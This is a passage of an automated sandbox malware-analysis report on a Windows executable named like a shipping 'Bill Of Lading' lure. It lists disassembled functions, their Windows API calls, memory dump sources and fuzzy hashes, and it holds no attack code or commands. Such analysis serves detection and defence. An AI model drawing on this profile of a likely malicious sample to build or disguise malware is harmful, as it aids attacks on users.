                                                                                                                      • ImageList_Create.COMCTL32(00000020,00000020,00000021,?,00000001), ref: 0046FC51
                                                                                                                      • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 0046FC73
                                                                                                                      • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 0046FC97
                                                                                                                      • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 0046FCA5
                                                                                                                      • SendMessageW.USER32 ref: 0046FD00
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$IconImageList_$CreateExtractReplace
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2632138820-0
                                                                                                                      • Opcode ID: 84d296b218fe0245d687438722339ecf4745b7249032fe4bb2113eafbff2dc59
                                                                                                                      • Instruction ID: f8b2170a3f6480226351c2682443129a31dd3945ebd2779c8b18a40e734619f9
                                                                                                                      • Opcode Fuzzy Hash: 84d296b218fe0245d687438722339ecf4745b7249032fe4bb2113eafbff2dc59
                                                                                                                      • Instruction Fuzzy Hash: A461BF70208305AFD320DF14DC85F5BB7E4FB89B14F10492EFA85972D1E7B4A8498B66
                                                                                                                      Function 00433BAC Relevance: 22.6, APIs: 15, Instructions: 79COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • LoadCursorW.USER32(00000000,00007F89), ref: 00433BC7
                                                                                                                      • LoadCursorW.USER32(00000000,00007F8A), ref: 00433BDE
                                                                                                                      • LoadCursorW.USER32(00000000,00007F03), ref: 00433BF5
                                                                                                                      • LoadCursorW.USER32(00000000,00007F8B), ref: 00433C0C
                                                                                                                      • LoadCursorW.USER32(00000000,00007F01), ref: 00433C23
                                                                                                                      • LoadCursorW.USER32(00000000,00007F88), ref: 00433C3A
                                                                                                                      • LoadCursorW.USER32(00000000,00007F86), ref: 00433C51
                                                                                                                      • LoadCursorW.USER32(00000000,00007F83), ref: 00433C68
                                                                                                                      • LoadCursorW.USER32(00000000,00007F85), ref: 00433C7F
                                                                                                                      • LoadCursorW.USER32(00000000,00007F82), ref: 00433C96
                                                                                                                      • LoadCursorW.USER32(00000000,00007F84), ref: 00433CAD
                                                                                                                      • LoadCursorW.USER32(00000000,00007F04), ref: 00433CC4
                                                                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 00433CDB
                                                                                                                      • LoadCursorW.USER32(00000000,00000000), ref: 00433CEF
                                                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00433D06
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CursorLoad
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3238433803-0
                                                                                                                      • Opcode ID: a9ae3fa102d058121485b558102ae55493db0c8a3ed3723cc80ee02977cbc66e
                                                                                                                      • Instruction ID: acd63d7325575073817552101614e6badc0a76bef24473f745c9da0ba21645f6
                                                                                                                      • Opcode Fuzzy Hash: a9ae3fa102d058121485b558102ae55493db0c8a3ed3723cc80ee02977cbc66e
                                                                                                                      • Instruction Fuzzy Hash: 6D310E3058C302FFE7504F50EE0AB1C36A0BB48B47F008C7DF64AA62E0E6F055009B9A
                                                                                                                      Function 00460ABB Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 294windowtimeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00460AF5
                                                                                                                      • _wcslen.LIBCMT ref: 00460B00
                                                                                                                      • __swprintf.LIBCMT ref: 00460B9E
                                                                                                                      • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00460C11
                                                                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00460C8E
                                                                                                                      • GetDlgCtrlID.USER32(?), ref: 00460CE6
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00460D21
                                                                                                                      • GetParent.USER32(?), ref: 00460D40
                                                                                                                      • ScreenToClient.USER32(00000000), ref: 00460D47
                                                                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00460DBE
                                                                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 00460DFB
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                                                                                                                      • String ID: %s%u
                                                                                                                      • API String ID: 1899580136-679674701
                                                                                                                      • Opcode ID: 263ba601bdfcacdbc09c0537f08939095875f2576dae1f9512caffb95b688f0a
                                                                                                                      • Instruction ID: ed0b46c26cbb3f928a943cd91895a09858176ee0e89b0f6962e21683ef9d2041
                                                                                                                      • Opcode Fuzzy Hash: 263ba601bdfcacdbc09c0537f08939095875f2576dae1f9512caffb95b688f0a
                                                                                                                      • Instruction Fuzzy Hash: 3AA1CD722043019BDB14DF54C884BEB73A8FF84714F04892EFD889B245E778E946CBA6
                                                                                                                      Function 0047D5F6 Relevance: 21.2, APIs: 4, Strings: 8, Instructions: 210COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CoTaskMemFree.OLE32(?), ref: 0047D6D3
                                                                                                                        • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                      • StringFromCLSID.OLE32(?,?), ref: 0047D6B5
                                                                                                                        • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                                                        • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                                                      • StringFromIID.OLE32(?,?), ref: 0047D7F0
                                                                                                                      • CoTaskMemFree.OLE32(?), ref: 0047D80A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeFromStringTask_wcslen$_wcscpy
                                                                                                                      • String ID: 0vH$CLSID\$Interface\$ProgID$ToolBoxBitmap32$inprocserver32$localserver32$HH
                                                                                                                      • API String ID: 2485709727-934586222
                                                                                                                      • Opcode ID: 94ff36e8c5adf47d5d15ad8c3baf2c81511e2686fb9cf3bb874d512fd4cd8d9e
                                                                                                                      • Instruction ID: 9b1d76abf7044590dd80f2c514dab21f357569e7696d0ed80310904c07b122bf
                                                                                                                      • Opcode Fuzzy Hash: 94ff36e8c5adf47d5d15ad8c3baf2c81511e2686fb9cf3bb874d512fd4cd8d9e
                                                                                                                      • Instruction Fuzzy Hash: 63714BB5614201AFC304EF25C981D5BB3F8BF88704F108A2EF5599B351DB78E905CB6A
                                                                                                                      Function 0045DB3E Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 181COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcscpy$Folder_memset$BrowseDesktopFromInitializeListMallocPathUninitialize
                                                                                                                      • String ID: HH
                                                                                                                      • API String ID: 3381189665-2761332787
                                                                                                                      • Opcode ID: cbd34bb05af2b60d6becc686f20e38c9c02ad4ea561bbadf99ecd2e28994155d
                                                                                                                      • Instruction ID: 9856a5a3be2a6f4b6f15ab218c20ab076772672eb14c4daba281b2e598c2a196
                                                                                                                      • Opcode Fuzzy Hash: cbd34bb05af2b60d6becc686f20e38c9c02ad4ea561bbadf99ecd2e28994155d
                                                                                                                      • Instruction Fuzzy Hash: E1619AB59043009FC320EF65C88499BB7E9BFC8704F048E1EF98987252D775E849CB6A
                                                                                                                      Function 00434506 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetDC.USER32(00000000), ref: 00434585
                                                                                                                      • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00434590
                                                                                                                      • CreateCompatibleDC.GDI32(00000000), ref: 0043459B
                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 004345A9
                                                                                                                      • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00434618
                                                                                                                      • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00434665
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                                                                                                      • String ID: (
                                                                                                                      • API String ID: 3300687185-3887548279
                                                                                                                      • Opcode ID: f1a61bd92dc1e5bf4a907c179000b9c6a14a2e3466c3eeb116f883cf8bb2fa69
                                                                                                                      • Instruction ID: a007e7ec8c3f390601fcb6226b5fc218b62818acb39bbc9fe8cd9ddeb27b86ed
                                                                                                                      • Opcode Fuzzy Hash: f1a61bd92dc1e5bf4a907c179000b9c6a14a2e3466c3eeb116f883cf8bb2fa69
                                                                                                                      • Instruction Fuzzy Hash: E4514871508345AFD310CF69C884B6BBBE9EF8A310F14881DFA9687390D7B5E844CB66
                                                                                                                      Function 0045E41B Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 150COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E463
                                                                                                                        • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                      • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E480
                                                                                                                      • __swprintf.LIBCMT ref: 0045E4D9
                                                                                                                      • _printf.LIBCMT ref: 0045E595
                                                                                                                      • _printf.LIBCMT ref: 0045E5B7
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: LoadString_printf$__swprintf_wcslen
                                                                                                                      • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR $HH
                                                                                                                      • API String ID: 3590180749-2894483878
                                                                                                                      • Opcode ID: ef66654f81976a0e6a78d75721240b4b5dad2d0c7f05b7bb9659983eace5fa73
                                                                                                                      • Instruction ID: 42a5c2f6345f2e10047da6565a111f96cfad8617a22bea28fc44504b1d19b7ce
                                                                                                                      • Opcode Fuzzy Hash: ef66654f81976a0e6a78d75721240b4b5dad2d0c7f05b7bb9659983eace5fa73
                                                                                                                      • Instruction Fuzzy Hash: 9F51A171518345ABD324EF91CC41DAF77A8AF84754F04093FF94463292EB78EE488B6A
                                                                                                                      Function 0046F90E Relevance: 21.1, APIs: 14, Instructions: 147windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0046F911
                                                                                                                      • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 0046F929
                                                                                                                      • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 0046F942
                                                                                                                      • DeleteObject.GDI32(?), ref: 0046F950
                                                                                                                      • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,00000000,00000000,00000000,00002010,?,000000F0), ref: 0046F95E
                                                                                                                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0046F9A8
                                                                                                                      • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 0046F9C1
                                                                                                                      • DeleteObject.GDI32(?), ref: 0046F9CF
                                                                                                                      • DestroyIcon.USER32(?,?,000000F7,00000001,00000000,?,00000001,00000000,00000000,00002010), ref: 0046F9DD
                                                                                                                      • ExtractIconExW.SHELL32(?,?,?,000000FF,00000001), ref: 0046FA1D
                                                                                                                      • DestroyIcon.USER32(?), ref: 0046FA4F
                                                                                                                      • SendMessageW.USER32(?,000000F7,00000001,?), ref: 0046FA5A
                                                                                                                      • DeleteObject.GDI32(?), ref: 0046FA68
                                                                                                                      • DestroyIcon.USER32(?,?,000000F7,00000001,?), ref: 0046FA76
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Icon$Destroy$DeleteMessageObjectSend$ImageLoad$ExtractLongWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3412594756-0
                                                                                                                      • Opcode ID: f692dd120a8e9e8c350368ee646f6d7ebba10fee5470a76da8eaf9bc85602db5
                                                                                                                      • Instruction ID: 2b127e2e725f503062080ad48664a75956f0b49bd2ac624c91da1236fc619d99
                                                                                                                      • Opcode Fuzzy Hash: f692dd120a8e9e8c350368ee646f6d7ebba10fee5470a76da8eaf9bc85602db5
                                                                                                                      • Instruction Fuzzy Hash: BD41B575344301ABE7209B65ED45B6B7398EB44711F00083EFA85A7381DBB9E809C76A
                                                                                                                      Function 0045D971 Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 140COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0045335B: CharLowerBuffW.USER32(?,?,?,0045D9DB,?,?,?), ref: 0045336E
                                                                                                                        • Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984
                                                                                                                      • GetDriveTypeW.KERNEL32 ref: 0045DA30
                                                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DA76
                                                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DAAB
                                                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DADF
                                                                                                                        • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: SendString$_wcslen$BuffCharDriveLowerType
                                                                                                                      • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                      • API String ID: 4013263488-4113822522
                                                                                                                      • Opcode ID: b9e44105478404289108567262d296c88e7101013f7783f6c7bd148379995db0
                                                                                                                      • Instruction ID: 78e8968fe3d68f28a61334a0544e46eb3ade7c09d07056eb4a028b8014bab4f9
                                                                                                                      • Opcode Fuzzy Hash: b9e44105478404289108567262d296c88e7101013f7783f6c7bd148379995db0
                                                                                                                      • Instruction Fuzzy Hash: 86516E71604300ABD710EF55CC85F5EB3E4AF88714F14496EF985AB2D2D7B8E908CB5A
                                                                                                                      Function 00435A35 Relevance: 21.1, APIs: 14, Instructions: 136timeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcslen$_wcsncpy$LocalTime__wcstoi64
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 228034949-0
                                                                                                                      • Opcode ID: d55b35800c2a6f74fd0df3de6656c0821778ac1c15f087543c4dc83ec7dd6154
                                                                                                                      • Instruction ID: c9113392db11e6d0b84b7dcaf0f9983ae7bcdcfbf3325debe08446cd55f13bc3
                                                                                                                      • Opcode Fuzzy Hash: d55b35800c2a6f74fd0df3de6656c0821778ac1c15f087543c4dc83ec7dd6154
                                                                                                                      • Instruction Fuzzy Hash: 874194B181435066DA10FF6AC8479DFB3A8EF89314F84495FF945D3162E378E64883AA
                                                                                                                      Function 004334CA Relevance: 21.1, APIs: 14, Instructions: 132filecommemoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,?,0046FAD5), ref: 004334F4
                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043350F
                                                                                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043351A
                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00433523
                                                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 00433533
                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0043353A
                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 00433541
                                                                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043354F
                                                                                                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,00482A20,?), ref: 00433568
                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 0043357B
                                                                                                                      • GetObjectW.GDI32(?,00000018,?), ref: 004335A6
                                                                                                                      • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004335DB
                                                                                                                      • DeleteObject.GDI32(?), ref: 00433603
                                                                                                                      • SendMessageW.USER32(?,00000172,00000000,?), ref: 0043361B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3969911579-0
                                                                                                                      • Opcode ID: c8af0a6d34b3156cf5dea3d494721158f709963105dd3e2632bd1b1f7de041f4
                                                                                                                      • Instruction ID: 5aed18668fdc988692497ed4484016cc97142e8c7c748bcd34b77a3330007e11
                                                                                                                      • Opcode Fuzzy Hash: c8af0a6d34b3156cf5dea3d494721158f709963105dd3e2632bd1b1f7de041f4
                                                                                                                      • Instruction Fuzzy Hash: 70410471204210AFD710DF64DC88F6BBBE8FB89711F10492DFA45972A0D7B5A941CBAA
                                                                                                                      Function 0045EEFF Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 74COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045EF6C
                                                                                                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045EF81
                                                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045EF94
                                                                                                                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045EFAB
                                                                                                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045EFB8
                                                                                                                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045EFD2
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: SendString$_wcslen
                                                                                                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                      • API String ID: 2420728520-1007645807
                                                                                                                      • Opcode ID: 2e8e49e05c1f121906b47c7a82fbb4c843ecfb9788746b18ac8014d8855edcbb
                                                                                                                      • Instruction ID: e5e6e3524f15ee9b53aa238c1547bf14c0af5fa70a1fb0ad50a0449216793e57
                                                                                                                      • Opcode Fuzzy Hash: 2e8e49e05c1f121906b47c7a82fbb4c843ecfb9788746b18ac8014d8855edcbb
                                                                                                                      • Instruction Fuzzy Hash: F321A53164830476E220FB51DC87F9E7798AB84B14F200D3BBA407A0D1DBA8E94CC76E
                                                                                                                      Function 00445A77 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 73windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetParent.USER32 ref: 00445A8D
